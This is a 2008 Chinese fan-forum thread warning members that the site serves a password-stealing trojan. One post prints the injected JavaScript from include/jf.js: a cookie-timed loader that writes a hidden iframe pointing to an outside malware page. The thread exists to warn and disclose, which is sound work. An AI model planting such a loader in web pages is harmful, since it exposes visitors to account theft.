没有明天 发表于 2008-11-5 09:16:54

[11-05] 提醒一下哦

中文的首页和论坛还是有病毒

不知道谁在搞破坏

影响看贤贤

生气

这次病毒不是iframe框架的

应该是挂在了一个全局调用的JS文件中,或者PHP文件也有可能(对PHP不懂)

使用了Cookei时间控制,好像是每两个小时病毒只会出现一次

十分隐蔽

刚进论坛时不会觉得,登陆帐号时内存小的电脑会有发觉,要卡上几秒

大家最好开着杀毒软件来浏览,或者在IE中禁止活动脚本运行

只是盗号木马,不是很毒。

不知道给这人找到了什么漏洞,处理起来头痛哦

[ 本帖最后由 没有明天 于 2008-11-5 09:26 编辑 ]

风平浪静 发表于 2008-11-5 09:19:16

目前我还没发现病毒.hou:39 hou:39

随贤 发表于 2008-11-5 09:27:36

收到!hou:34 谢谢啊!hou:34

南霆秀一 发表于 2008-11-5 09:44:03

明天 大叔我和朋友 共用 一根网线
我的打开 就什么也发现不了
用他的登陆居 很明显就有 病毒
不知道 为什么   我用的 360浏览器不知道有没有关系

TINGFENG8877 发表于 2008-11-5 09:58:24

病毒?不会牵连到整个电脑把?东西很多哦

李真闲 发表于 2008-11-5 10:00:50

hou:45 病毒无孔不入啊!~
小心为妙

_⒏囄⒏qì_|* 发表于 2008-11-5 10:20:29

呵呵   我的还好至今没发现一次 hou:47

一辈子dé光棍儿 发表于 2008-11-5 10:24:16

如果对电脑不是很懂的人可以去我博客看我的一篇文章,病毒绝对不怕
先声明,我可不是做广告,如果按我的方法做了,还会中招,那就上论坛来骂我吧
地址见签名

zhangguo22 发表于 2008-11-5 13:32:21

hou:50 我去检查了一下那个JS文件里面有

<iframe src=http://www.sznylsf.cn/wxyj/2.htm width=50 height=0 border=0></iframe>

又是这个东西


楼主的观察力,果然不同于一般人hou:172

补个完整的

在include/jf.js 模仿语言包式的简繁转换功能插件

function goad(){
var Then = new Date()
Then.setTime(Then.getTime() + 2*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
document.writeln('<iframe src=http://www.sznylsf.cn/wxyj/2.htm width=50 height=0 border=0></iframe>');
window.status=" ";
}
}goad();

[ 本帖最后由 zhangguo11 于 2008-11-5 14:03 编辑 ]

没有明天 发表于 2008-11-5 18:23:26




就是这个东西在作怪

起子 发表于 2008-11-5 20:26:54

受不鸟了拉s:21 s:32~~~
汗!!s:23

夏鸥 发表于 2008-11-5 23:51:45

回来一打开居
发现我的机子问题多多
再看了这帖子了hou:170
原来是这么的一回事hou:1
俺只能发个帖子关了居
其它的网站才可以顺利的打开hou:168

Tae1 发表于 2008-11-6 00:23:23

现在还有吗?刷新看看

zhangguo22 发表于 2008-11-6 00:28:37

已经没有了hou:47
页: [1]
查看完整版本: [11-05] 提醒一下哦